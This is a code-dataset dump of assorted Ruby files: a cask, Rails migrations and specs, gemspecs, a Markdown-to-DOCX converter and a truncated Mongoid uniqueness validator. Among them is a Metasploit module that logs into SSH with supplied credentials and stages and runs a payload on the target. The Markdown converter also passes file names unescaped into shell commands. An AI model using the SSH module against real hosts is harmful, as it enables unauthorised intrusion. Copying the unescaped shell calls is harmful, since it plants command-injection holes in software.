hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
1ad71f89528a8b27a1c2ee3952957cef0b019a13 | 450 | cask 'ipvanish-vpn' do
version '2.2.1_234'
sha256 '0f44ac51d46c5fa09131719548dc73760a4db7005a999b1f9cc4c295f37e15b8'
url "https://www.ipvanish.com/software/osx/IPVanish_v#{version}.zip"
appcast 'https://www.ipvanish.com/software/osx/updates.xml',
checkpoint: '999bcbe8e257f51dd07573199541e90c7fd130db717445024e2cd55b0d916507'
name 'IPVanish'
homepage 'https://www.ipvanish.com/'
license :gratis
app 'IPVanish VPN.app'
end
| 32.142857 | 88 | 0.771111 |
7943f4121e396016ce7fb0ce808bdd62ea6ecd69 | 213 | class RemoveHasPrivateAccessAndSignInCountFromUsers < ActiveRecord::Migration[4.2]
def change
remove_column :users, :has_private_access, :boolean
remove_column :users, :sign_in_count, :integer
end
end
| 30.428571 | 82 | 0.793427 |
18f6bc64e0e2dd146134889c2a256c567312e3e1 | 5,267 | require "optparse"
require "rubygems"
require "tmpdir"
require "pathname"
require "rexml/document"
class MD2XML
def add_header(text, level, body)
@in_list = false
node = REXML::Element.new("w:p", body)
pPr = REXML::Element.new("w:pPr", node)
REXML::Element.new("w:pStyle", pPr).add_attribute("w:val", level)
r = REXML::Element.new("w:r", node)
REXML::Element.new("w:t", r).text = text
end
def add_listitem(text, level, style, body)
unless @in_list
@in_list = true
@id += 1
@list_id[level] = @id
end
if level > @current_level
@id += 1
@list_id[level] = @id
end
@current_level = level
myid = @list_id[level]
node = REXML::Element.new("w:p", body)
pPr = REXML::Element.new("w:pPr", node)
pStyle = REXML::Element.new("w:pStyle", pPr)
numPr = REXML::Element.new("w:numPr", pPr)
REXML::Element.new("w:ilvl", numPr).add_attribute("w:val", (level-1).to_s)
REXML::Element.new("w:numId", numPr).add_attribute("w:val", myid)
pstyle_val = REXML::XPath.first(@stylehash[style], "w:pPr/w:pStyle").attribute("w:val")
pStyle.add_attribute("w:val", pstyle_val)
REXML::Element.new("w:ind", pPr).add_attribute("w:leftChars", "0")
r = REXML::Element.new("w:r", node)
REXML::Element.new("w:t", r).text = text
numid = REXML::XPath.first(@stylehash[style], "w:pPr/w:numPr/w:numId").attribute("w:val").to_s
@numIdhash[myid] = @numhash[numid]
end
def add_paragraph(text, body)
@in_list = false
p = REXML::Element.new("w:p", body)
r = REXML::Element.new("w:r", p)
REXML::Element.new("w:t", r).text = text
end
def parse(line, body)
if line=~/^(#+) (.*)/
add_header(Regexp.last_match(2), Regexp.last_match(1).size, body)
elsif line=~/^(\s*)[0-9]+\. (.*)/
level = Regexp.last_match(1).length/4+1
add_listitem(Regexp.last_match(2), level, "enum"+level.to_s, body)
elsif line=~/^(\s*)\* (.*)/
level = Regexp.last_match(1).length/4+1
add_listitem(Regexp.last_match(2), level, "bullet"+level.to_s, body)
else
add_paragraph(line, body)
end
end
def make_numhash(dir)
@numhash = {}
file = dir + "/word/numbering.xml"
doc = REXML::Document.new(File.read(file))
REXML::XPath.each(doc.root, "w:num") do |e|
numid = e.attribute("w:numId").to_s.to_i
abstractnumid = REXML::XPath.first(e, "w:abstractNumId").attribute("w:val")
@numhash[numid.to_s] = abstractnumid.to_s.to_i
@id = numid if @id < numid
end
end
def make_numbering(dir)
file = dir + "/word/numbering.xml"
doc = REXML::Document.new(File.read(file))
abstractNumIds = REXML::XPath.each(doc.root, "w:abstractNum").collect { |e| e }
nums = REXML::XPath.each(doc.root, "w:num").collect { |e| e }
REXML::XPath.first(doc.root).each { |e| doc.root.delete e }
@numIdhash.each do |k, v|
e_abs = Marshal.load(Marshal.dump(abstractNumIds[v]))
e_abs.add_attribute("w:abstractNumId", abstractNumIds.size)
n = REXML::Element.new("w:num")
n.add_attribute("w:numId", k)
REXML::Element.new("w:abstractNumId", n).add_attribute("w:val", abstractNumIds.size)
abstractNumIds.push e_abs
nums.push n
end
abstractNumIds.size.times do |i|
e = abstractNumIds[i]
REXML::XPath.first(e, "w:nsid").add_attribute("w:val", format("%08d", i))
doc.root.add e
end
nums.each { |e| doc.root.add e }
File.write file, doc.to_s
end
def make_document(dir, mdfile)
file = dir + "/word/document.xml"
doc = REXML::Document.new(File.read(file))
body = REXML::XPath.first(doc.root, "w:body")
REXML::XPath.each(body, "w:p") do |e|
@stylehash[Regexp.last_match(1)] = e if e.to_s =~/(enum[1-9])/ || e.to_s =~/(bullet[1-9])/
end
REXML::XPath.each(body, "w:p").collect { |e| body.delete_element e }
open(mdfile) do |f|
while line = f.gets
parse(line, body)
end
end
File.write file, doc.to_s
end
def convert(dir, mdfile)
@id = 0
make_numhash(dir)
@in_list = false
@list_id = Array.new(10)
@stylehash = {}
@current_level = 0
@numIdhash = {}
make_document(dir, mdfile)
make_numbering(dir)
end
end
def parse_option
opts = {}
args = []
OptionParser.new do |op|
op.on("-t [template]", "--template [template file]") { |v| args[:template] = v }
op.on("-o [output]", "--output [output file]") { |v| args[:output] = v }
op.banner += " file"
args = op.parse!(ARGV)
if args.empty?
puts op.help
exit
end
end
[opts, args]
end
opts, args = parse_option
input_file = args[0]
unless File.exist?(input_file)
puts "#{input_file}: No such file or directory"
exit
end
template_file = opts.fetch(:template, "template.docx")
output_default = Pathname(input_file).sub_ext(".docx")
output_file = opts.fetch(:output, output_default)
Dir.mktmpdir(nil, "./") do |dir|
puts "Using #{template_file}"
`cd #{dir};unzip ../#{template_file}`
files = Dir.glob(dir+"/*").map { |f| File.basename(f) }
puts "Reading #{input_file}"
MD2XML.new.convert(dir, input_file)
puts "Generating #{output_file}"
`cd #{dir};zip -r ../#{output_file} #{files.join(" ")}`
puts "Done."
end
| 30.445087 | 98 | 0.618568 |
1816163b2c9dba1fc04e39468c70124842d97a16 | 309 | require "fog/xml/version"
require "nokogiri"
module Fog
autoload :ToHashDocument, "fog/to_hash_document"
module XML
autoload :SAXParserConnection, "fog/xml/sax_parser_connection"
autoload :Connection, "fog/xml/connection"
end
module Parsers
autoload :Base, "fog/parsers/base"
end
end
| 19.3125 | 66 | 0.744337 |
f71fae79348266d1964259ece0e7738d9817dae4 | 1,319 | # -*- encoding: utf-8 -*-
# stub: liquid 3.0.6 ruby lib
Gem::Specification.new do |s|
s.name = "liquid".freeze
s.version = "3.0.6"
s.required_rubygems_version = Gem::Requirement.new(">= 1.3.7".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Tobias Luetke".freeze]
s.date = "2015-07-24"
s.email = ["[email protected]".freeze]
s.extra_rdoc_files = ["History.md".freeze, "README.md".freeze]
s.files = ["History.md".freeze, "README.md".freeze]
s.homepage = "http://www.liquidmarkup.org".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "2.7.4".freeze
s.summary = "A secure, non-evaling end user template engine with aesthetic markup.".freeze
s.installed_by_version = "2.7.4" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<minitest>.freeze, [">= 0"])
else
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<minitest>.freeze, [">= 0"])
end
else
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<minitest>.freeze, [">= 0"])
end
end
| 35.648649 | 116 | 0.661107 |
28cf7c95e5ca6f6ad9fb96c2a9f1c760668ef509 | 658 | module Sinatra
module MercuryImages
# register app
def self.registered(app)
# stream images
app.get %r{(.gif|.jpg|.png|.jpeg)$} do
content_type get_image_type(request.path_info)
File.open(options.views + request.path_info, 'rb') do |file|
file.read
end
end
end
# get image
def get_image_type(image_name)
if image_name =~ /.gif/
"image/gif"
elsif image_name =~ /.jpg/
"image/jpg"
elsif image_name =~ /.png/
"image/png"
elsif image_name =~ /.jpeg/
"image/jpeg"
end
end
end
register MercuryImages
end
| 21.933333 | 69 | 0.56383 |
08a8726280286b575aa7ac5b6be3497b84f118df | 3,633 | # Copyright © 2011-2020 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
class Dashboard::Breadcrumber
include ActionView::Helpers::TagHelper
include Rails.application.routes.url_helpers
def initialize
clear
end
def clear(opts={})
if opts[:crumb]
@crumbs.delete(opts[:crumb])
else
@crumbs = Hash.new
end
if opts[:filters]
@filters = opts[:filters]
end
self
end
def add_crumbs(crumbs)
crumbs.each do |sym, value|
add_crumb(sym, value)
end
self
end
def add_crumb(sym, value)
@crumbs[sym] = value
self
end
def breadcrumbs
labels_and_urls = [
protocol_label_and_url,
edit_protocol_label_and_url,
ssr_label_and_url,
notifications_label_and_url
].compact!
crumbs = [content_tag(:li, content_tag(:a, 'Dashboard', href: dashboard_protocols_path(@filters)))]
labels_and_urls.each_with_index do |breadcrumb_array, index|
label, url = breadcrumb_array
if index == labels_and_urls.size - 1
crumbs << content_tag(:li, label, class: "active")
else
crumbs << content_tag(:li, content_tag(:a, label, href: url))
end
end
crumbs.join(content_tag(:li, '/', class: 'px-2')).html_safe
end
private
def protocol_label_and_url
protocol_id = @crumbs[:protocol_id]
protocol_id ? [("(#{protocol_id}) " + Protocol.find(protocol_id).short_title).truncate(50), "/dashboard/protocols/#{protocol_id}"] : nil
end
def ssr_label_and_url
sub_service_request_id = @crumbs[:sub_service_request_id]
sub_service_request_id ? [SubServiceRequest.find(sub_service_request_id).label.truncate(50), "/dashboard/sub_service_requests/#{sub_service_request_id}"] : nil
end
def notifications_label_and_url
self.clear(crumb: :protocol_id)
self.clear(crumb: :sub_service_request_id)
@crumbs[:notifications] ? [I18n.t('dashboard.notifications.header'), "/dashboard/notifications"] : nil
end
def edit_protocol_label_and_url
protocol_id = @crumbs[:edit_protocol]
protocol_id ? ["Edit", "/dashboard/protocols/#{protocol_id}/edit"] : nil
end
end
| 36.33 | 163 | 0.734104 |
bb5963b22e2c2365c086b29f789ceda930bbccb5 | 573 | # This code is free software; you can redistribute it and/or modify it under
# the terms of the new BSD License.
#
# Copyright (c) 2009-2013, Sebastian Staudt
# This module is used as a wrapper around Steam Condenser's classes
#
# It does not provide any own functionality, but this file is used as an entry
# point when using the gem (i.e. +require 'steam-condenser').
#
# @author Sebastian Staudt
module SteamCondenser
end
require 'steam-condenser/logging'
require 'steam-condenser/version'
require 'steam-condenser/community/all'
require 'steam-condenser/servers/all'
| 30.157895 | 78 | 0.769634 |
034e8a6a4e55ce4b4c2e393090282245f1eba600 | 1,425 | # encoding: utf-8
require 'spec_helper'
require Rails.root.join('db', 'post_migrate', '20170313133418_rename_more_reserved_project_names.rb')
# This migration uses multiple threads, and thus different transactions. This
# means data created in this spec may not be visible to some threads. To work
# around this we use the DELETE cleaning strategy.
describe RenameMoreReservedProjectNames, :delete do
let(:migration) { described_class.new }
let!(:project) { create(:project) } # rubocop:disable RSpec/FactoriesInMigrationSpecs
before do
project.path = 'artifacts'
project.save!(validate: false)
end
describe '#up' do
context 'when project repository exists' do
before do
project.create_repository
end
context 'when no exception is raised' do
it 'renames project with reserved names' do
migration.up
expect(project.reload.path).to eq('artifacts0')
end
end
context 'when exception is raised during rename' do
before do
allow(project).to receive(:rename_repo).and_raise(StandardError)
end
it 'captures exception from project rename' do
expect { migration.up }.not_to raise_error
end
end
end
context 'when project repository does not exist' do
it 'does not raise error' do
expect { migration.up }.not_to raise_error
end
end
end
end
| 28.5 | 101 | 0.686316 |
e98a4cb47577be20533ad4e4870fe0cedfece359 | 3,603 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::CmdStagerBourne
attr_accessor :ssh_socket
def initialize
super(
'Name' => 'SSH User Code Execution',
'Description' => %q{
This module utilizes a stager to upload a base64 encoded
binary which is then decoded, chmod'ed and executed from
the command shell.
},
'Author' => ['Spencer McIntyre', 'Brandon Knight'],
'References' =>
[
[ 'CVE', '1999-0502'] # Weak password
],
'License' => MSF_LICENSE,
'Privileged' => true,
'DefaultOptions' =>
{
'PrependFork' => 'true',
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 4096,
'BadChars' => "",
'DisableNops' => true
},
'Platform' => %w{ linux osx },
'Targets' =>
[
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
[ 'Linux x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'linux'
},
],
[ 'OSX x86',
{
'Arch' => ARCH_X86,
'Platform' => 'osx'
},
],
],
'DefaultTarget' => 0,
# For the CVE
'DisclosureDate' => 'Jan 01 1999'
)
register_options(
[
OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
OptString.new('RHOST', [ true, "The target address" ]),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
]
)
end
def execute_command(cmd, opts = {})
begin
Timeout.timeout(3) do
self.ssh_socket.exec!("#{cmd}\n")
end
rescue ::Exception
end
end
def do_login(ip, user, pass, port)
opt_hash = {
:auth_methods => ['password', 'keyboard-interactive'],
:msframework => framework,
:msfmodule => self,
:port => port,
:disable_agent => true,
:password => pass
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
rescue Rex::ConnectionError, Rex::AddressInUse
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, 'Failed authentication')
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
end
if not self.ssh_socket
fail_with(Failure::Unknown)
end
return
end
def exploit
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
execute_cmdstager({:linemax => 500})
end
end
| 27.090226 | 101 | 0.547322 |
1132bf61875d6cdf29c8216cb39c3cad4f049ff2 | 128 | class CloseAllTaxAdjustments < ActiveRecord::Migration
def up
Spree::Adjustment.tax.update_all(finalized: true)
end
end
| 21.333333 | 54 | 0.78125 |
1a02e7c41c5313fd0bcc7d248e1e4e1d7d026c68 | 1,478 | require 'rails_helper'
RSpec.describe Herstory::RecordCallbacks do
before :all do
Arrival.logs_changes includes: {users: {}, shipments: {superordinate: :record}}
Thread.current[:current_user] = User.create({name: 'Joanne Doe'})
end
context "when included in a class" do
it "doesn't log a creation event when invalid" do
expect do
Arrival.create(number_of_trucks: 0)
end.to_not change(Event, :count)
end
it "logs a creation event when valid" do
arrival = Arrival.create
expect(arrival.events.first.type).to eq('created')
end
end
context "when invalid save is triggered" do
let(:arrival) { Herstory.without_logging { Arrival.create } }
it "doesn't log attribute changes" do
@params = {number_of_trucks: 0}
expect do
arrival.update(@params)
end.to_not change(arrival.events.reload, :count)
end
it "doesn't log additions to collections" do
shipment = arrival.shipments.build({pieces: 0})
expect do
begin
arrival.shipments << shipment
rescue
end
end.to_not change(arrival.events.reload, :count)
end
end
context "when save is triggered" do
let(:arrival) { Herstory.without_logging { Arrival.create } }
it "logs attribute changes" do
@params = {number_of_trucks: 21}
expect do
arrival.update(@params)
end.to change(arrival.events.reload, :count).by(1)
end
end
end
| 25.050847 | 83 | 0.654939 |
7aaaa57bde3a6d1ce4d7cccdf8d30abaa5a839c5 | 581 | require "test_helper"
class ReadableTest < MiniTest::Spec
Credentials = Struct.new(:password)
class PasswordForm < TestForm
property :password, readable: false
end
let(:cred) { Credentials.new }
let(:form) { PasswordForm.new(cred) }
it {
assert_nil form.password # password not read.
form.validate("password" => "123")
assert_equal form.password, "123"
form.sync
assert_equal cred.password, "123" # password written.
hash = {}
form.save do |nested|
hash = nested
end
assert_equal hash, "password" => "123"
}
end
| 18.741935 | 57 | 0.655766 |
1d0a4e9b200624df94ce7193c314b209d885b46c | 2,613 | class FortniteNewsAndInfo::Fortnite
attr_accessor :brNews, :statsV2, :battle_royale_news, :creative_news, :save_the_world_news, :lifetime_keyboard, :lifetime_gamepad, :lifetime_touch, :lifetime_all
require 'pry'
def initialize
####
#is there a better place to do this????
####
newAPIconection = FortniteNewsAndInfo::API.new
@brNews = newAPIconection.getBRnews
@statsV2 = newAPIconection.get_statsV2
####
# new code to work with objects rather than stored variables
####
gtypes
fortniteGamers
news_type
add_articles
#binding.pry
end
#get subjects
def news_type
self.brNews.each do |name, data|
# binding.pry
if name == "battleroyalenews" || name == "creativenews" || name == "savetheworldnews"
NewsType.new(name)
end
end
end
##add articles
def add_articles
NewsType.all.each do |s|
# binding.pry
# if s.name == "savetheworldnews" || s.name == "battleroyalenews"
# binding.pry
# self.brNews["#{s.name}"]["news"]["messages"].each do |a_data|
# na = Article.new(a_data["title"], a_data["body"], s, a_data["image"])
# s.articles << na
# end
# else
self.brNews["#{s.name}"]["news"]["messages"].each do |a_data|
na = Article.new(a_data["title"], a_data["body"], s, a_data["image"])
s.articles << na
end
# end
end
end
#gets gamer types adds to array of gamertypes and creates gamertype objects
def gtypes
self.statsV2["lifetime"].each do |gt, gs|
# binding.pry
GamerType.find_or_create_by_name(gt)
end
end
#go through each gamertype and get its list of gamers then create each gamer.
def fortniteGamers
#taking gamertype and linking a gamer to it
GamerType.all.each do |gt|
mxd_ary = []
self.statsV2["lifetime"]["#{gt.name}"].each do |gamer|
stats = {}
gamer[1].each do |k,v|
stats[":#{k}"] = v
end
mxd_ary << {":name" => gamer[0], ":stats" => stats }
end
Gamer.create_gamer(gt, mxd_ary)
gt.gamers_scores
gt.top_gamers
# binding.pry
end
end
end | 31.481928 | 165 | 0.511672 |
3944565badb086ad3ca62e0608396a8c5db2cc3e | 9,069 | # -*- encoding: utf-8 -*-
require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/common', __FILE__)
describe "File.expand_path" do
before :each do
platform_is :windows do
@base = `cd`.chomp.tr '\\', '/'
@tmpdir = "c:/tmp"
@rootdir = "c:/"
end
platform_is_not :windows do
@base = Dir.pwd
@tmpdir = "/tmp"
@rootdir = "/"
end
end
with_feature :encoding do
before :each do
@external = Encoding.default_external
end
after :each do
Encoding.default_external = @external
end
end
it "converts a pathname to an absolute pathname" do
File.expand_path('').should == @base
File.expand_path('a').should == File.join(@base, 'a')
File.expand_path('a', nil).should == File.join(@base, 'a')
end
not_compliant_on :ironruby do
it "converts a pathname to an absolute pathname, Ruby-Talk:18512" do
# See Ruby-Talk:18512
File.expand_path('.a').should == File.join(@base, '.a')
File.expand_path('..a').should == File.join(@base, '..a')
File.expand_path('a../b').should == File.join(@base, 'a../b')
end
end
platform_is_not :windows do
it "keeps trailing dots on absolute pathname" do
# See Ruby-Talk:18512
File.expand_path('a.').should == File.join(@base, 'a.')
File.expand_path('a..').should == File.join(@base, 'a..')
end
end
it "converts a pathname to an absolute pathname, using a complete path" do
File.expand_path("", "#{@tmpdir}").should == "#{@tmpdir}"
File.expand_path("a", "#{@tmpdir}").should =="#{@tmpdir}/a"
File.expand_path("../a", "#{@tmpdir}/xxx").should == "#{@tmpdir}/a"
File.expand_path(".", "#{@rootdir}").should == "#{@rootdir}"
end
# FIXME: do not use conditionals like this around #it blocks
unless not home = ENV['HOME']
platform_is_not :windows do
it "converts a pathname to an absolute pathname, using ~ (home) as base" do
File.expand_path('~').should == home
File.expand_path('~', '/tmp/gumby/ddd').should == home
File.expand_path('~/a', '/tmp/gumby/ddd').should == File.join(home, 'a')
end
it "does not return a frozen string" do
File.expand_path('~').frozen?.should == false
File.expand_path('~', '/tmp/gumby/ddd').frozen?.should == false
File.expand_path('~/a', '/tmp/gumby/ddd').frozen?.should == false
end
end
platform_is :windows do
it "converts a pathname to an absolute pathname, using ~ (home) as base" do
File.expand_path('~').should == home.tr("\\", '/')
File.expand_path('~', '/tmp/gumby/ddd').should == home.tr("\\", '/')
File.expand_path('~/a', '/tmp/gumby/ddd').should == File.join(home.tr("\\", '/'), 'a')
end
it "does not return a frozen string" do
File.expand_path('~').frozen?.should == false
File.expand_path('~', '/tmp/gumby/ddd').frozen?.should == false
File.expand_path('~/a', '/tmp/gumby/ddd').frozen?.should == false
end
end
end
platform_is_not :windows do
# FIXME: these are insane!
it "expand path with" do
File.expand_path("../../bin", "/tmp/x").should == "/bin"
File.expand_path("../../bin", "/tmp").should == "/bin"
File.expand_path("../../bin", "/").should == "/bin"
File.expand_path("../bin", "tmp/x").should == File.join(@base, 'tmp', 'bin')
File.expand_path("../bin", "x/../tmp").should == File.join(@base, 'bin')
end
it "expand_path for commoms unix path give a full path" do
File.expand_path('/tmp/').should =='/tmp'
File.expand_path('/tmp/../../../tmp').should == '/tmp'
File.expand_path('').should == Dir.pwd
File.expand_path('./////').should == Dir.pwd
File.expand_path('.').should == Dir.pwd
File.expand_path(Dir.pwd).should == Dir.pwd
File.expand_path('~/').should == ENV['HOME']
File.expand_path('~/..badfilename').should == "#{ENV['HOME']}/..badfilename"
File.expand_path('..').should == Dir.pwd.split('/')[0...-1].join("/")
File.expand_path('~/a','~/b').should == "#{ENV['HOME']}/a"
end
not_compliant_on :rubinius, :macruby do
it "does not replace multiple '/' at the beginning of the path" do
File.expand_path('////some/path').should == "////some/path"
end
end
deviates_on :rubinius, :macruby do
it "replaces multiple '/' with a single '/' at the beginning of the path" do
File.expand_path('////some/path').should == "/some/path"
end
end
it "replaces multiple '/' with a single '/'" do
File.expand_path('/some////path').should == "/some/path"
end
it "raises an ArgumentError if the path is not valid" do
lambda { File.expand_path("~a_not_existing_user") }.should raise_error(ArgumentError)
end
it "expands ~ENV['USER'] to the user's home directory" do
File.expand_path("~#{ENV['USER']}").should == ENV['HOME']
File.expand_path("~#{ENV['USER']}/a").should == "#{ENV['HOME']}/a"
end
it "does not expand ~ENV['USER'] when it's not at the start" do
File.expand_path("/~#{ENV['USER']}/a").should == "/~#{ENV['USER']}/a"
end
it "expands ../foo with ~/dir as base dir to /path/to/user/home/foo" do
File.expand_path('../foo', '~/dir').should == "#{ENV['HOME']}/foo"
end
end
ruby_version_is "1.9" do
it "accepts objects that have a #to_path method" do
File.expand_path(mock_to_path("a"), mock_to_path("#{@tmpdir}"))
end
end
it "raises a TypeError if not passed a String type" do
lambda { File.expand_path(1) }.should raise_error(TypeError)
lambda { File.expand_path(nil) }.should raise_error(TypeError)
lambda { File.expand_path(true) }.should raise_error(TypeError)
end
platform_is_not :windows do
it "expands /./dir to /dir" do
File.expand_path("/./dir").should == "/dir"
end
end
platform_is :windows do
it "expands C:/./dir to C:/dir" do
File.expand_path("C:/./dir").should == "C:/dir"
end
end
ruby_version_is "1.9" do
with_feature :encoding do
ruby_version_is ""..."2.0" do
it "produces a String in the default external encoding" do
Encoding.default_external = Encoding::SHIFT_JIS
path = "./a".force_encoding Encoding::CP1251
File.expand_path(path).encoding.should equal(Encoding::SHIFT_JIS)
end
end
ruby_version_is "2.0" do
it "returns a String in the same encoding as the argument" do
Encoding.default_external = Encoding::SHIFT_JIS
path = "./a".force_encoding Encoding::CP1251
File.expand_path(path).encoding.should equal(Encoding::CP1251)
weird_path = "\xde\xad\xbe\xaf".force_encoding Encoding::ASCII_8BIT
File.expand_path(weird_path).encoding.should equal(Encoding::ASCII_8BIT)
end
end
it "expands a path when the default external encoding is ASCII-8BIT" do
Encoding.default_external = Encoding::ASCII_8BIT
File.expand_path("\xde\xad\xbe\xaf", "/").should == "/\xde\xad\xbe\xaf"
end
it "expands a path with multi-byte characters" do
File.expand_path("Ångström").should == "#{@base}/Ångström"
end
it "raises an Encoding::CompatibilityError if the external encoding is not compatible" do
Encoding.default_external = Encoding::UTF_16BE
lambda { File.expand_path("./a") }.should raise_error(Encoding::CompatibilityError)
end
end
end
it "does not modify the string argument" do
str = "./a/b/../c"
File.expand_path(str, @base).should == "#{@base}/a/c"
str.should == "./a/b/../c"
end
it "does not modify a HOME string argument" do
str = "~/a"
File.expand_path(str).should == "#{home_directory.tr('\\', '/')}/a"
str.should == "~/a"
end
it "returns a String when passed a String subclass" do
str = FileSpecs::SubString.new "./a/b/../c"
path = File.expand_path(str, @base)
path.should == "#{@base}/a/c"
path.should be_an_instance_of(String)
end
end
platform_is_not :windows do
describe "File.expand_path when HOME is not set" do
before :each do
@home = ENV["HOME"]
end
after :each do
ENV["HOME"] = @home
end
it "raises an ArgumentError when passed '~' if HOME is nil" do
ENV.delete "HOME"
lambda { File.expand_path("~") }.should raise_error(ArgumentError)
end
it "raises an ArgumentError when passed '~/' if HOME is nil" do
ENV.delete "HOME"
lambda { File.expand_path("~/") }.should raise_error(ArgumentError)
end
ruby_version_is ""..."1.8.7" do
it "returns '/' when passed '~' if HOME == ''" do
ENV["HOME"] = ""
File.expand_path("~").should == "/"
end
end
ruby_version_is "1.8.7" do
it "raises an ArgumentError when passed '~' if HOME == ''" do
ENV["HOME"] = ""
lambda { File.expand_path("~") }.should raise_error(ArgumentError)
end
end
end
end
| 34.222642 | 95 | 0.605469 |
f887dc569acf91cc6354b4f5e2adb06531544b91 | 10,155 | # frozen_string_literal: true
# encoding: utf-8
module Mongoid
module Validatable
# Validates whether or not a field is unique against the documents in the
# database.
#
# @example Define the uniqueness validator.
#
# class Person
# include Mongoid::Document
# field :title
#
# validates_uniqueness_of :title
# end
#
# It is also possible to limit the uniqueness constraint to a set of
# records matching certain conditions:
# class Person
# include Mongoid::Document
# field :title
# field :active, type: Boolean
#
# validates_uniqueness_of :title, conditions: -> {where(active: true)}
# end
class UniquenessValidator < ActiveModel::EachValidator
include Queryable
# Validate the document for uniqueness violations.
#
# @example Validate the document.
# validate_each(person, :title, "Sir")
#
# @param [ Document ] document The document to validate.
# @param [ Symbol ] attribute The field to validate on.
# @param [ Object ] value The value of the field.
#
# @return [ Errors ] The errors.
#
# @since 1.0.0
def validate_each(document, attribute, value)
with_query(document) do
attrib, val = to_validate(document, attribute, value)
return unless validation_required?(document, attrib)
if document.embedded?
validate_embedded(document, attrib, val)
else
validate_root(document, attrib, val)
end
end
end
private
# Add the error to the document.
#
# @api private
#
# @example Add the error.
# validator.add_error(doc, :name, "test")
#
# @param [ Document ] document The document to validate.
# @param [ Symbol ] attribute The name of the attribute.
# @param [ Object ] value The value of the object.
#
# @since 2.4.10
def add_error(document, attribute, value)
document.errors.add(
attribute, :taken, options.except(:case_sensitive, :scope).merge(value: value)
)
end
# Should the uniqueness validation be case sensitive?
#
# @api private
#
# @example Is the validation case sensitive?
# validator.case_sensitive?
#
# @return [ true, false ] If the validation is case sensitive.
#
# @since 2.3.0
def case_sensitive?
!(options[:case_sensitive] == false)
end
# Create the validation criteria.
#
# @api private
#
# @example Create the criteria.
# validator.create_criteria(User, user, :name, "syd")
#
# @param [ Class, Proxy ] base The base to execute the criteria from.
# @param [ Document ] document The document to validate.
# @param [ Symbol ] attribute The name of the attribute.
# @param [ Object ] value The value of the object.
#
# @return [ Criteria ] The criteria.
#
# @since 2.4.10
def create_criteria(base, document, attribute, value)
criteria = scope(base.unscoped, document, attribute)
criteria.selector.update(criterion(document, attribute, value.mongoize))
criteria
end
# Get the default criteria for checking uniqueness.
#
# @api private
#
# @example Get the criteria.
# validator.criterion(person, :title, "Sir")
#
# @param [ Document ] document The document to validate.
# @param [ Symbol ] attribute The name of the attribute.
# @param [ Object ] value The value of the object.
#
# @return [ Criteria ] The uniqueness criteria.
#
# @since 2.3.0
def criterion(document, attribute, value)
field = document.database_field_name(attribute)
if value && localized?(document, field)
conditions = (value || {}).inject([]) { |acc, (k,v)| acc << { "#{field}.#{k}" => filter(v) }}
selector = { "$or" => conditions }
else
selector = { field => filter(value) }
end
if document.persisted? && !document.embedded?
selector.merge!(_id: { "$ne" => document._id })
end
selector
end
# Filter the value based on whether the check is case sensitive or not.
#
# @api private
#
# @example Filter the value.
# validator.filter("testing")
#
# @param [ Object ] value The value to filter.
